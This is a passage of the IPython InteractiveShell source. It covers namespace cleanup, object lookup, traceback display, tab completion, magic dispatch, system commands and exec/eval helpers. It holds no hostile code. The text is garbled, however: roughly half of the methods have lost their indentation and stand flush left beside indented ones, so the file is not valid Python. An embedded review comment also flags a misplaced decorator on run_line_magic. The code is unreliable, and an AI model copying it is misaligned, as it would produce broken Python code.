        # Flush the private list of module references kept for script
        # execution protection
        self.clear_main_mod_cache()
def del_var(self, varname, by_name=False):
"""Delete a variable from the various namespaces, so that, as
far as possible, we're not keeping any hidden references to it.
Parameters
----------
varname : str
The name of the variable to delete.
by_name : bool
If True, delete variables with the given name in each
namespace. If False (default), find the variable in the user
namespace, and delete references to it.
"""
if varname in ('__builtin__', '__builtins__'):
raise ValueError("Refusing to delete %s" % varname)
ns_refs = self.all_ns_refs
if by_name: # Delete by name
for ns in ns_refs:
try:
del ns[varname]
except KeyError:
pass
else: # Delete by object
try:
obj = self.user_ns[varname]
except KeyError:
raise NameError("name '%s' is not defined" % varname)
# Also check in output history
ns_refs.append(self.history_manager.output_hist)
for ns in ns_refs:
to_delete = [n for n, o in ns.items() if o is obj]
for name in to_delete:
del ns[name]
# Ensure it is removed from the last execution result
if self.last_execution_result.result is obj:
self.last_execution_result = None
# displayhook keeps extra references, but not in a dictionary
for name in ('_', '__', '___'):
if getattr(self.displayhook, name) is obj:
setattr(self.displayhook, name, None)
def reset_selective(self, regex=None):
"""Clear selective variables from internal namespaces based on a
specified regular expression.
Parameters
----------
regex : string or compiled pattern, optional
A regular expression pattern that will be used in searching
variable names in the users namespaces.
"""
if regex is not None:
try:
m = re.compile(regex)
except TypeError:
raise TypeError('regex must be a string or compiled pattern')
# Search for keys in each namespace that match the given regex
# If a match is found, delete the key/value pair.
for ns in self.all_ns_refs:
for var in ns:
if m.search(var):
del ns[var]
def push(self, variables, interactive=True):
"""Inject a group of variables into the IPython user namespace.
Parameters
----------
variables : dict, str or list/tuple of str
The variables to inject into the user's namespace. If a dict, a
simple update is done. If a str, the string is assumed to have
variable names separated by spaces. A list/tuple of str can also
be used to give the variable names. If just the variable names are
give (list/tuple/str) then the variable values looked up in the
callers frame.
interactive : bool
If True (default), the variables will be listed with the ``who``
magic.
"""
vdict = None
# We need a dict of name/value pairs to do namespace updates.
if isinstance(variables, dict):
vdict = variables
elif isinstance(variables, (str, list, tuple)):
if isinstance(variables, str):
vlist = variables.split()
else:
vlist = variables
vdict = {}
cf = sys._getframe(1)
for name in vlist:
try:
vdict[name] = eval(name, cf.f_globals, cf.f_locals)
except:
print('Could not get variable %s from %s' %
(name,cf.f_code.co_name))
else:
raise ValueError('variables must be a dict/str/list/tuple')
# Propagate variables to user namespace
self.user_ns.update(vdict)
# And configure interactive visibility
user_ns_hidden = self.user_ns_hidden
if interactive:
for name in vdict:
user_ns_hidden.pop(name, None)
else:
user_ns_hidden.update(vdict)
def drop_by_id(self, variables):
"""Remove a dict of variables from the user namespace, if they are the
same as the values in the dictionary.
This is intended for use by extensions: variables that they've added can
be taken back out if they are unloaded, without removing any that the
user has overwritten.
Parameters
----------
variables : dict
A dictionary mapping object names (as strings) to the objects.
"""
for name, obj in variables.items():
if name in self.user_ns and self.user_ns[name] is obj:
del self.user_ns[name]
self.user_ns_hidden.pop(name, None)
    #-------------------------------------------------------------------------
    # Things related to object introspection
    #-------------------------------------------------------------------------

    def _ofind(self, oname, namespaces=None):
        """Find an object in the available namespaces.

        Returns a dict with keys: found, obj, parent, ismagic, isalias,
        namespace.  Has special code to detect magic functions.

        Parameters
        ----------
        oname : str
            Name to look up; may be dotted (``a.b.c``) and may carry a
            %/%% magic prefix.
        namespaces : list of (label, dict) pairs, optional
            Namespaces to search, in order; defaults to the interactive,
            global and builtin namespaces.
        """
        oname = oname.strip()
        # Reject anything that is neither a magic nor a dotted chain of
        # plain identifiers.
        if not oname.startswith(ESC_MAGIC) and \
            not oname.startswith(ESC_MAGIC2) and \
            not all(a.isidentifier() for a in oname.split(".")):
            return {'found': False}

        if namespaces is None:
            # Namespaces to search in:
            # Put them in a list. The order is important so that we
            # find things in the same order that Python finds them.
            namespaces = [ ('Interactive', self.user_ns),
                           ('Interactive (global)', self.user_global_ns),
                           ('Python builtin', builtin_mod.__dict__),
                           ]

        ismagic = False
        isalias = False
        found = False
        ospace = None
        parent = None
        obj = None

        # Look for the given name by splitting it in parts.  If the head is
        # found, then we look for all the remaining parts as members, and only
        # declare success if we can find them all.
        oname_parts = oname.split('.')
        oname_head, oname_rest = oname_parts[0],oname_parts[1:]
        for nsname,ns in namespaces:
            try:
                obj = ns[oname_head]
            except KeyError:
                continue
            else:
                for idx, part in enumerate(oname_rest):
                    try:
                        parent = obj
                        # The last part is looked up in a special way to avoid
                        # descriptor invocation as it may raise or have side
                        # effects.
                        if idx == len(oname_rest) - 1:
                            obj = self._getattr_property(obj, part)
                        else:
                            obj = getattr(obj, part)
                    except:
                        # Blanket except b/c some badly implemented objects
                        # allow __getattr__ to raise exceptions other than
                        # AttributeError, which then crashes IPython.
                        break
                else:
                    # If we finish the for loop (no break), we got all members
                    found = True
                    ospace = nsname
                    break  # namespace loop

        # Try to see if it's magic
        if not found:
            obj = None
            if oname.startswith(ESC_MAGIC2):
                oname = oname.lstrip(ESC_MAGIC2)
                obj = self.find_cell_magic(oname)
            elif oname.startswith(ESC_MAGIC):
                oname = oname.lstrip(ESC_MAGIC)
                obj = self.find_line_magic(oname)
            else:
                # search without prefix, so run? will find %run?
                obj = self.find_line_magic(oname)
                if obj is None:
                    obj = self.find_cell_magic(oname)
            if obj is not None:
                found = True
                ospace = 'IPython internal'
                ismagic = True
                isalias = isinstance(obj, Alias)

        # Last try: special-case some literals like '', [], {}, etc:
        if not found and oname_head in ["''",'""','[]','{}','()']:
            obj = eval(oname_head)
            found = True
            ospace = 'Interactive'

        return {
                'obj':obj,
                'found':found,
                'parent':parent,
                'ismagic':ismagic,
                'isalias':isalias,
                'namespace':ospace
               }
@staticmethod
def _getattr_property(obj, attrname):
"""Property-aware getattr to use in object finding.
If attrname represents a property, return it unevaluated (in case it has
side effects or raises an error.
"""
if not isinstance(obj, type):
try:
# `getattr(type(obj), attrname)` is not guaranteed to return
# `obj`, but does so for property:
#
# property.__get__(self, None, cls) -> self
#
# The universal alternative is to traverse the mro manually
# searching for attrname in class dicts.
attr = getattr(type(obj), attrname)
except AttributeError:
pass
else:
# This relies on the fact that data descriptors (with both
# __get__ & __set__ magic methods) take precedence over
# instance-level attributes:
#
# class A(object):
# @property
# def foobar(self): return 123
# a = A()
# a.__dict__['foobar'] = 345
# a.foobar # == 123
#
# So, a property may be returned right away.
if isinstance(attr, property):
return attr
# Nothing helped, fall back.
return getattr(obj, attrname)
    def _object_find(self, oname, namespaces=None):
        """Find an object and return a struct with info about it.

        Thin wrapper around :meth:`_ofind` that packs the result dict into a
        ``Struct`` for attribute-style access (``info.found``, ``info.obj``).
        """
        return Struct(self._ofind(oname, namespaces))
def _inspect(self, meth, oname, namespaces=None, **kw):
"""Generic interface to the inspector system.
This function is meant to be called by pdef, pdoc & friends.
"""
info = self._object_find(oname, namespaces)
docformat = sphinxify if self.sphinxify_docstring else None
if info.found:
pmethod = getattr(self.inspector, meth)
# TODO: only apply format_screen to the plain/text repr of the mime
# bundle.
formatter = format_screen if info.ismagic else docformat
if meth == 'pdoc':
pmethod(info.obj, oname, formatter)
elif meth == 'pinfo':
pmethod(
info.obj,
oname,
formatter,
info,
enable_html_pager=self.enable_html_pager,
**kw
)
else:
pmethod(info.obj, oname)
else:
print('Object `%s` not found.' % oname)
return 'not found' # so callers can take other action
def object_inspect(self, oname, detail_level=0):
"""Get object info about oname"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector.info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
return oinspect.object_info(name=oname, found=False)
    def object_inspect_text(self, oname, detail_level=0):
        """Get object info as formatted text.

        Convenience wrapper returning only the ``'text/plain'`` entry of
        :meth:`object_inspect_mime`.
        """
        return self.object_inspect_mime(oname, detail_level)['text/plain']
def object_inspect_mime(self, oname, detail_level=0):
"""Get object info as a mimebundle of formatted representations.
A mimebundle is a dictionary, keyed by mime-type.
It must always have the key `'text/plain'`.
"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector._get_info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
raise KeyError(oname)
    #-------------------------------------------------------------------------
    # Things related to history management
    #-------------------------------------------------------------------------

    def init_history(self):
        """Sets up the command history, and starts regular autosaves."""
        self.history_manager = HistoryManager(shell=self, parent=self)
        # Track it so configuration changes reach the manager (presumably
        # the configurables list is consumed by the traitlets machinery).
        self.configurables.append(self.history_manager)
#-------------------------------------------------------------------------
# Things related to exception handling and tracebacks (not debugging)
#-------------------------------------------------------------------------
debugger_cls = Pdb
    def set_custom_exc(self, exc_tuple, handler):
        """set_custom_exc(exc_tuple, handler)

        Set a custom exception handler, which will be called if any of the
        exceptions in exc_tuple occur in the mainloop (specifically, in the
        run_code() method).

        Parameters
        ----------
        exc_tuple : tuple of exception classes
            A *tuple* of exception classes, for which to call the defined
            handler.  It is very important that you use a tuple, and NOT A
            LIST here, because of the way Python's except statement works.  If
            you only want to trap a single exception, use a singleton tuple::

                exc_tuple == (MyCustomException,)

        handler : callable
            handler must have the following signature::

                def my_handler(self, etype, value, tb, tb_offset=None):
                    ...
                    return structured_traceback

            Your handler must return a structured traceback (a list of strings),
            or None.

            This will be made into an instance method (via types.MethodType)
            of IPython itself, and it will be called if any of the exceptions
            listed in the exc_tuple are caught.  If the handler is None, an
            internal basic one is used, which just prints basic info.

            To protect IPython from crashes, if your handler ever raises an
            exception or returns an invalid result, it will be immediately
            disabled.

        WARNING: by putting in your own exception handler into IPython's main
        execution loop, you run a very good chance of nasty crashes.  This
        facility should only be used if you really know what you are doing."""

        if not isinstance(exc_tuple, tuple):
            raise TypeError("The custom exceptions must be given as a tuple.")

        def validate_stb(stb):
            """validate structured traceback return type

            return type of CustomTB *should* be a list of strings, but allow
            single strings or None, which are harmless.

            This function will *always* return a list of strings,
            and will raise a TypeError if stb is inappropriate.
            """
            msg = "CustomTB must return list of strings, not %r" % stb
            if stb is None:
                return []
            elif isinstance(stb, str):
                return [stb]
            elif not isinstance(stb, list):
                raise TypeError(msg)
            # it's a list
            for line in stb:
                # check every element
                if not isinstance(line, str):
                    raise TypeError(msg)
            return stb

        if handler is None:
            wrapped = dummy_handler
        else:
            def wrapped(self,etype,value,tb,tb_offset=None):
                """wrap CustomTB handler, to protect IPython from user code

                This makes it harder (but not impossible) for custom exception
                handlers to crash IPython.
                """
                try:
                    stb = handler(self,etype,value,tb,tb_offset=tb_offset)
                    return validate_stb(stb)
                except:
                    # clear custom handler immediately
                    self.set_custom_exc((), None)
                    print("Custom TB Handler failed, unregistering", file=sys.stderr)
                    # show the exception in handler first
                    stb = self.InteractiveTB.structured_traceback(*sys.exc_info())
                    print(self.InteractiveTB.stb2text(stb))
                    print("The original exception:")
                    stb = self.InteractiveTB.structured_traceback(
                        (etype,value,tb), tb_offset=tb_offset
                    )
                return stb

        # Bind the wrapper as an instance method so handlers can use `self`.
        self.CustomTB = types.MethodType(wrapped,self)
        self.custom_exceptions = exc_tuple
    def excepthook(self, etype, value, tb):
        """One more defense for GUI apps that call sys.excepthook.

        GUI frameworks like wxPython trap exceptions and call
        sys.excepthook themselves.  I guess this is a feature that
        enables them to keep running after exceptions that would
        otherwise kill their mainloop. This is a bother for IPython
        which expects to catch all of the program exceptions with a try:
        except: statement.

        Normally, IPython sets sys.excepthook to a CrashHandler instance, so if
        any app directly invokes sys.excepthook, it will look to the user like
        IPython crashed.  In order to work around this, we can disable the
        CrashHandler and replace it with this excepthook instead, which prints a
        regular traceback using our InteractiveTB.  In this fashion, apps which
        call sys.excepthook will generate a regular-looking exception from
        IPython, and the CrashHandler will only be triggered by real IPython
        crashes.

        This hook should be used sparingly, only in places which are not likely
        to be true IPython errors.
        """
        self.showtraceback((etype, value, tb), tb_offset=0)
def _get_exc_info(self, exc_tuple=None):
"""get exc_info from a given tuple, sys.exc_info() or sys.last_type etc.
Ensures sys.last_type,value,traceback hold the exc_info we found,
from whichever source.
raises ValueError if none of these contain any information
"""
if exc_tuple is None:
etype, value, tb = sys.exc_info()
else:
etype, value, tb = exc_tuple
if etype is None:
if hasattr(sys, 'last_type'):
etype, value, tb = sys.last_type, sys.last_value, \
sys.last_traceback
if etype is None:
raise ValueError("No exception to find")
# Now store the exception info in sys.last_type etc.
# WARNING: these variables are somewhat deprecated and not
# necessarily safe to use in a threaded environment, but tools
# like pdb depend on their existence, so let's set them. If we
# find problems in the field, we'll need to revisit their use.
sys.last_type = etype
sys.last_value = value
sys.last_traceback = tb
return etype, value, tb
def show_usage_error(self, exc):
"""Show a short message for UsageErrors
These are special exceptions that shouldn't show a traceback.
"""
print("UsageError: %s" % exc, file=sys.stderr)
def get_exception_only(self, exc_tuple=None):
"""
Return as a string (ending with a newline) the exception that
just occurred, without any traceback.
"""
etype, value, tb = self._get_exc_info(exc_tuple)
msg = traceback.format_exception_only(etype, value)
return ''.join(msg)
    def showtraceback(self, exc_tuple=None, filename=None, tb_offset=None,
                      exception_only=False, running_compiled_code=False):
        """Display the exception that just occurred.

        If nothing is known about the exception, this is the method which
        should be used throughout the code for presenting user tracebacks,
        rather than directly invoking the InteractiveTB object.

        A specific showsyntaxerror() also exists, but this method can take
        care of calling it if needed, so unless you are explicitly catching a
        SyntaxError exception, don't try to analyze the stack manually and
        simply call this method.

        Parameters
        ----------
        exc_tuple : (etype, value, tb) tuple, optional
            Exception info; defaults to sys.exc_info()/sys.last_*.
        filename : str, optional
            Passed through to showsyntaxerror for SyntaxError display.
        tb_offset : int, optional
            Number of frames to skip from the top of the traceback.
        exception_only : bool
            If True, show just the exception plus a hint about %tb.
        running_compiled_code : bool
            Passed through to showsyntaxerror for a fuller stack trace.
        """
        try:
            try:
                etype, value, tb = self._get_exc_info(exc_tuple)
            except ValueError:
                print('No traceback available to show.', file=sys.stderr)
                return

            if issubclass(etype, SyntaxError):
                # Though this won't be called by syntax errors in the input
                # line, there may be SyntaxError cases with imported code.
                self.showsyntaxerror(filename, running_compiled_code)
            elif etype is UsageError:
                self.show_usage_error(value)
            else:
                if exception_only:
                    stb = ['An exception has occurred, use %tb to see '
                           'the full traceback.\n']
                    stb.extend(self.InteractiveTB.get_exception_only(etype,
                                                                     value))
                else:
                    try:
                        # Exception classes can customise their traceback - we
                        # use this in IPython.parallel for exceptions occurring
                        # in the engines. This should return a list of strings.
                        stb = value._render_traceback_()
                    except Exception:
                        stb = self.InteractiveTB.structured_traceback(etype,
                                            value, tb, tb_offset=tb_offset)

                    self._showtraceback(etype, value, stb)
                    if self.call_pdb:
                        # drop into debugger
                        self.debugger(force=True)
                    return

                # Actually show the traceback
                self._showtraceback(etype, value, stb)

        except KeyboardInterrupt:
            # Don't let Ctrl-C during traceback rendering leave the user
            # without any report at all.
            print('\n' + self.get_exception_only(), file=sys.stderr)
    def _showtraceback(self, etype, evalue, stb):
        """Actually show a traceback.

        Subclasses may override this method to put the traceback on a different
        place, like a side channel.

        Parameters
        ----------
        etype : type
            Exception class (unused here, but available to subclasses).
        evalue : BaseException
            Exception instance (unused here, but available to subclasses).
        stb : list of str
            Structured traceback as produced by the traceback formatters.
        """
        print(self.InteractiveTB.stb2text(stb))
def showsyntaxerror(self, filename=None, running_compiled_code=False):
"""Display the syntax error that just occurred.
This doesn't display a stack trace because there isn't one.
If a filename is given, it is stuffed in the exception instead
of what was there before (because Python's parser always uses
"<string>" when reading from a string).
If the syntax error occurred when running a compiled code (i.e. running_compile_code=True),
longer stack trace will be displayed.
"""
etype, value, last_traceback = self._get_exc_info()
if filename and issubclass(etype, SyntaxError):
try:
value.filename = filename
except:
# Not the format we expect; leave it alone
pass
# If the error occurred when executing compiled code, we should provide full stacktrace.
elist = traceback.extract_tb(last_traceback) if running_compiled_code else []
stb = self.SyntaxTB.structured_traceback(etype, value, elist)
self._showtraceback(etype, value, stb)
# This is overridden in TerminalInteractiveShell to show a message about
# the %paste magic.
def showindentationerror(self):
"""Called by _run_cell when there's an IndentationError in code entered
at the prompt.
This is overridden in TerminalInteractiveShell to show a message about
the %paste magic."""
self.showsyntaxerror()
    #-------------------------------------------------------------------------
    # Things related to readline
    #-------------------------------------------------------------------------

    def init_readline(self):
        """DEPRECATED

        Moved to terminal subclass, here only to simplify the init logic."""
        # Set a number of methods that depend on readline to be no-op
        warnings.warn('`init_readline` is no-op since IPython 5.0 and is Deprecated',
                      DeprecationWarning, stacklevel=2)
        # no_op is a do-nothing placeholder defined elsewhere in this module.
        self.set_custom_completer = no_op
    @skip_doctest
    def set_next_input(self, s, replace=False):
        """ Sets the 'default' input string for the next command line.

        Example::

            In [1]: _ip.set_next_input("Hello Word")
            In [2]: Hello Word_  # cursor is here

        Parameters
        ----------
        s : str
            Text to pre-fill the next input prompt with.
        replace : bool
            Accepted but unused here (presumably honoured by frontends that
            consume ``rl_next_input`` — confirm).
        """
        self.rl_next_input = s
    def _indent_current_str(self):
        """Return the current level of indentation as a string of spaces."""
        return self.input_splitter.get_indent_spaces() * ' '
    #-------------------------------------------------------------------------
    # Things related to text completion
    #-------------------------------------------------------------------------

    def init_completer(self):
        """Initialize the completion machinery.

        This creates completion machinery that can be used by client code,
        either interactively in-process (typically triggered by the readline
        library), programmatically (such as in test suites) or out-of-process
        (typically over the network by remote frontends).
        """
        from IPython.core.completer import IPCompleter
        from IPython.core.completerlib import (module_completer,
                magic_run_completer, cd_completer, reset_completer)

        self.Completer = IPCompleter(shell=self,
                                     namespace=self.user_ns,
                                     global_namespace=self.user_global_ns,
                                     parent=self,
                                     )
        self.configurables.append(self.Completer)

        # Add custom completers to the basic ones built into IPCompleter
        sdisp = self.strdispatchers.get('complete_command', StrDispatch())
        self.strdispatchers['complete_command'] = sdisp
        self.Completer.custom_completers = sdisp

        # Register per-command argument completers for common keywords/magics.
        self.set_hook('complete_command', module_completer, str_key = 'import')
        self.set_hook('complete_command', module_completer, str_key = 'from')
        self.set_hook('complete_command', module_completer, str_key = '%aimport')
        self.set_hook('complete_command', magic_run_completer, str_key = '%run')
        self.set_hook('complete_command', cd_completer, str_key = '%cd')
        self.set_hook('complete_command', reset_completer, str_key = '%reset')
    @skip_doctest
    def complete(self, text, line=None, cursor_pos=None):
        """Return the completed text and a list of completions.

        Parameters
        ----------
        text : string
            A string of text to be completed on.  It can be given as empty and
            instead a line/position pair are given.  In this case, the
            completer itself will split the line like readline does.
        line : string, optional
            The complete line that text is part of.
        cursor_pos : int, optional
            The position of the cursor on the input line.

        Returns
        -------
        text : string
            The actual text that was completed.
        matches : list
            A sorted list with all possible completions.

        The optional arguments allow the completion to take more context into
        account, and are part of the low-level completion API.

        This is a wrapper around the completion mechanism, similar to what
        readline does at the command line when the TAB key is hit.  By
        exposing it as a method, it can be used by other non-readline
        environments (such as GUIs) for text completion.

        Simple usage example:

            In [1]: x = 'hello'

            In [2]: _ip.complete('x.l')
            Out[2]: ('x.l', ['x.ljust', 'x.lower', 'x.lstrip'])
        """
        # Inject names into __builtin__ so we can complete on the added names.
        with self.builtin_trap:
            return self.Completer.complete(text, line, cursor_pos)
def set_custom_completer(self, completer, pos=0) -> None:
"""Adds a new custom completer function.
The position argument (defaults to 0) is the index in the completers
list where you want the completer to be inserted.
`completer` should have the following signature::
def completion(self: Completer, text: string) -> List[str]:
raise NotImplementedError
It will be bound to the current Completer instance and pass some text
and return a list with current completions to suggest to the user.
"""
newcomp = types.MethodType(completer, self.Completer)
self.Completer.custom_matchers.insert(pos,newcomp)
def set_completer_frame(self, frame=None):
"""Set the frame of the completer."""
if frame:
self.Completer.namespace = frame.f_locals
self.Completer.global_namespace = frame.f_globals
else:
self.Completer.namespace = self.user_ns
self.Completer.global_namespace = self.user_global_ns
    #-------------------------------------------------------------------------
    # Things related to magics
    #-------------------------------------------------------------------------

    # Defined here so that it's included in the documentation
    # NOTE(review): this @functools.wraps call copies the metadata of
    # MagicsManager.register_function onto run_line_magic, which looks
    # misplaced — it presumably belonged to a register_magic_function
    # wrapper that is missing from this revision.  Confirm before removing.
    @functools.wraps(magic.MagicsManager.register_function)
    def run_line_magic(self, magic_name, line, _stack_depth=1):
        """Execute the given line magic.

        Parameters
        ----------
        magic_name : str
            Name of the desired magic function, without '%' prefix.
        line : str
            The rest of the input line as a single string.
        _stack_depth : int
            If run_line_magic() is called from magic() then _stack_depth=2.
            This is added to ensure backward compatibility for use of
            'get_ipython().magic()'

        Raises
        ------
        UsageError
            If no line magic of that name exists (with a hint when a cell
            magic of the same name does).
        """
        fn = self.find_line_magic(magic_name)
        if fn is None:
            cm = self.find_cell_magic(magic_name)
            etpl = "Line magic function `%%%s` not found%s."
            extra = '' if cm is None else (' (But cell magic `%%%%%s` exists, '
                                           'did you mean that instead?)' % magic_name )
            raise UsageError(etpl % (magic_name, extra))
        else:
            # Note: this is the distance in the stack to the user's frame.
            # This will need to be updated if the internal calling logic gets
            # refactored, or else we'll be expanding the wrong variables.

            # Determine stack_depth depending on where run_line_magic() has been called
            stack_depth = _stack_depth
            if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
                # magic has opted out of var_expand
                magic_arg_s = line
            else:
                magic_arg_s = self.var_expand(line, stack_depth)
            # Put magic args in a list so we can call with f(*a) syntax
            args = [magic_arg_s]
            kwargs = {}
            # Grab local namespace if we need it:
            if getattr(fn, "needs_local_scope", False):
                kwargs['local_ns'] = self.get_local_scope(stack_depth)
            with self.builtin_trap:
                result = fn(*args, **kwargs)
            return result
def get_local_scope(self, stack_depth):
"""Get local scope at given stack depth.
Parameters
----------
stack_depth : int
Depth relative to calling frame
"""
return sys._getframe(stack_depth + 1).f_locals
    def run_cell_magic(self, magic_name, line, cell):
        """Execute the given cell magic.

        Parameters
        ----------
        magic_name : str
            Name of the desired magic function, without '%' prefix.
        line : str
            The rest of the first input line as a single string.
        cell : str
            The body of the cell as a (possibly multiline) string.

        Raises
        ------
        UsageError
            If no cell magic of that name exists, or if the cell body is
            empty (with hints when a same-named line magic exists).
        """
        fn = self.find_cell_magic(magic_name)
        if fn is None:
            lm = self.find_line_magic(magic_name)
            etpl = "Cell magic `%%{0}` not found{1}."
            extra = '' if lm is None else (' (But line magic `%{0}` exists, '
                                           'did you mean that instead?)'.format(magic_name))
            raise UsageError(etpl.format(magic_name, extra))
        elif cell == '':
            message = '%%{0} is a cell magic, but the cell body is empty.'.format(magic_name)
            if self.find_line_magic(magic_name) is not None:
                message += ' Did you mean the line magic %{0} (single %)?'.format(magic_name)
            raise UsageError(message)
        else:
            # Note: this is the distance in the stack to the user's frame.
            # This will need to be updated if the internal calling logic gets
            # refactored, or else we'll be expanding the wrong variables.
            stack_depth = 2
            if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
                # magic has opted out of var_expand
                magic_arg_s = line
            else:
                magic_arg_s = self.var_expand(line, stack_depth)
            kwargs = {}
            if getattr(fn, "needs_local_scope", False):
                kwargs['local_ns'] = self.user_ns

            with self.builtin_trap:
                args = (magic_arg_s, cell)
                result = fn(*args, **kwargs)
            return result
def find_line_magic(self, magic_name):
"""Find and return a line magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['line'].get(magic_name)
def find_cell_magic(self, magic_name):
"""Find and return a cell magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['cell'].get(magic_name)
def find_magic(self, magic_name, magic_kind='line'):
"""Find and return a magic of the given type by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics[magic_kind].get(magic_name)
def magic(self, arg_s):
"""DEPRECATED. Use run_line_magic() instead.
Call a magic function by name.
Input: a string containing the name of the magic function to call and
any additional arguments to be passed to the magic.
magic('name -opt foo bar') is equivalent to typing at the ipython
prompt:
In[1]: %name -opt foo bar
To call a magic without arguments, simply use magic('name').
This provides a proper Python function to call IPython's magics in any
valid Python code you can type at the interpreter, including loops and
compound statements.
"""
# TODO: should we issue a loud deprecation warning here?
magic_name, _, magic_arg_s = arg_s.partition(' ')
magic_name = magic_name.lstrip(prefilter.ESC_MAGIC)
return self.run_line_magic(magic_name, magic_arg_s, _stack_depth=2)
#-------------------------------------------------------------------------
# Things related to macros
#-------------------------------------------------------------------------
def define_macro(self, name, themacro):
"""Define a new macro
Parameters
----------
name : str
The name of the macro.
themacro : str or Macro
The action to do upon invoking the macro. If a string, a new
Macro object is created by passing the string to it.
"""
from IPython.core import macro
if isinstance(themacro, str):
themacro = macro.Macro(themacro)
if not isinstance(themacro, macro.Macro):
raise ValueError('A macro must be a string or a Macro instance.')
self.user_ns[name] = themacro
#-------------------------------------------------------------------------
# Things related to the running of system commands
#-------------------------------------------------------------------------
def system_piped(self, cmd):
"""Call the given cmd in a subprocess, piping stdout/err
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported. Should not be a command that expects input
other than simple text.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
# We do not support backgrounding processes because we either use
# pexpect or pipes to read from. Users can always just call
# os.system() or use ip.system=ip.system_raw
# if they really want a background process.
raise OSError("Background processes not supported.")
# we explicitly do NOT return the subprocess status code, because
# a non-None value would trigger :func:`sys.displayhook` calls.
# Instead, we store the exit_code in user_ns.
self.user_ns['_exit_code'] = system(self.var_expand(cmd, depth=1))
    def system_raw(self, cmd):
        """Call the given cmd in a subprocess using os.system on Windows or
        subprocess.call using the system shell on other platforms.

        Stores the exit code in ``self.user_ns['_exit_code']`` instead of
        returning it; signal-terminated commands are recorded as negative
        signal numbers (e.g. Ctrl-C -> -2).

        Parameters
        ----------
        cmd : str
            Command to execute.
        """
        cmd = self.var_expand(cmd, depth=1)
        # protect os.system from UNC paths on Windows, which it can't handle:
        if sys.platform == 'win32':
            from IPython.utils._process_win32 import AvoidUNCPath
            with AvoidUNCPath() as path:
                if path is not None:
                    # Re-anchor the command in a drive-letter path first.
                    cmd = '"pushd %s &&"%s' % (path, cmd)
                try:
                    ec = os.system(cmd)
                except KeyboardInterrupt:
                    print('\n' + self.get_exception_only(), file=sys.stderr)
                    ec = -2
        else:
            # For posix the result of the subprocess.call() below is an exit
            # code, which by convention is zero for success, positive for
            # program failure.  Exit codes above 128 are reserved for signals,
            # and the formula for converting a signal to an exit code is usually
            # signal_number+128.  To more easily differentiate between exit
            # codes and signals, ipython uses negative numbers.  For instance
            # since control-c is signal 2 but exit code 130, ipython's
            # _exit_code variable will read -2.  Note that some shells like
            # csh and fish don't follow sh/bash conventions for exit codes.
            executable = os.environ.get('SHELL', None)
            try:
                # Use env shell instead of default /bin/sh
                ec = subprocess.call(cmd, shell=True, executable=executable)
            except KeyboardInterrupt:
                # intercept control-C; a long traceback is not useful here
                print('\n' + self.get_exception_only(), file=sys.stderr)
                ec = 130
            if ec > 128:
                # Map signal-style exit codes (signal+128) to -signal.
                ec = -(ec - 128)

        # We explicitly do NOT return the subprocess status code, because
        # a non-None value would trigger :func:`sys.displayhook` calls.
        # Instead, we store the exit_code in user_ns.  Note the semantics
        # of _exit_code: for control-c, _exit_code == -signal.SIGNIT,
        # but raising SystemExit(_exit_code) will give status 254!
        self.user_ns['_exit_code'] = ec
# use piped system by default, because it is better behaved
system = system_piped
def getoutput(self, cmd, split=True, depth=0):
"""Get output (possibly including stderr) from a subprocess.
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported.
split : bool, optional
If True, split the output into an IPython SList. Otherwise, an
IPython LSString is returned. These are objects similar to normal
lists and strings, with a few convenience attributes for easier
manipulation of line-based output. You can use '?' on them for
details.
depth : int, optional
How many frames above the caller are the local variables which should
be expanded in the command string? The default (0) assumes that the
expansion variables are in the stack frame calling this function.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
raise OSError("Background processes not supported.")
out = getoutput(self.var_expand(cmd, depth=depth+1))
if split:
out = SList(out.splitlines())
else:
out = LSString(out)
return out
#-------------------------------------------------------------------------
# Things related to aliases
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Things related to extensions
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Things related to payloads
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Things related to the prefilter
#-------------------------------------------------------------------------
def auto_rewrite_input(self, cmd):
"""Print to the screen the rewritten form of the user's command.
This shows visual feedback by rewriting input lines that cause
automatic calling to kick in, like::
/f x
into::
------> f(x)
after the user's input prompt. This helps the user understand that the
input line was transformed automatically by IPython.
"""
if not self.show_rewritten_input:
return
# This is overridden in TerminalInteractiveShell to use fancy prompts
print("------> " + cmd)
#-------------------------------------------------------------------------
# Things related to extracting values/expressions from kernel and user_ns
#-------------------------------------------------------------------------
def _user_obj_error(self):
"""return simple exception dict
for use in user_expressions
"""
etype, evalue, tb = self._get_exc_info()
stb = self.InteractiveTB.get_exception_only(etype, evalue)
exc_info = {
u'status' : 'error',
u'traceback' : stb,
u'ename' : etype.__name__,
u'evalue' : py3compat.safe_unicode(evalue),
}
return exc_info
def _format_user_obj(self, obj):
"""format a user object to display dict
for use in user_expressions
"""
data, md = self.display_formatter.format(obj)
value = {
'status' : 'ok',
'data' : data,
'metadata' : md,
}
return value
def user_expressions(self, expressions):
"""Evaluate a dict of expressions in the user's namespace.
Parameters
----------
expressions : dict
A dict with string keys and string values. The expression values
should be valid Python expressions, each of which will be evaluated
in the user namespace.
Returns
-------
A dict, keyed like the input expressions dict, with the rich mime-typed
display_data of each value.
"""
out = {}
user_ns = self.user_ns
global_ns = self.user_global_ns
for key, expr in expressions.items():
try:
value = self._format_user_obj(eval(expr, global_ns, user_ns))
except:
value = self._user_obj_error()
out[key] = value
return out
#-------------------------------------------------------------------------
# Things related to the running of code
#-------------------------------------------------------------------------
def ex(self, cmd):
"""Execute a normal python statement in user namespace."""
with self.builtin_trap:
exec(cmd, self.user_global_ns, self.user_ns)
def ev(self, expr):
"""Evaluate python expression expr in user namespace.
Returns the result of evaluation
"""
with self.builtin_trap:
return eval(expr, self.user_global_ns, self.user_ns)
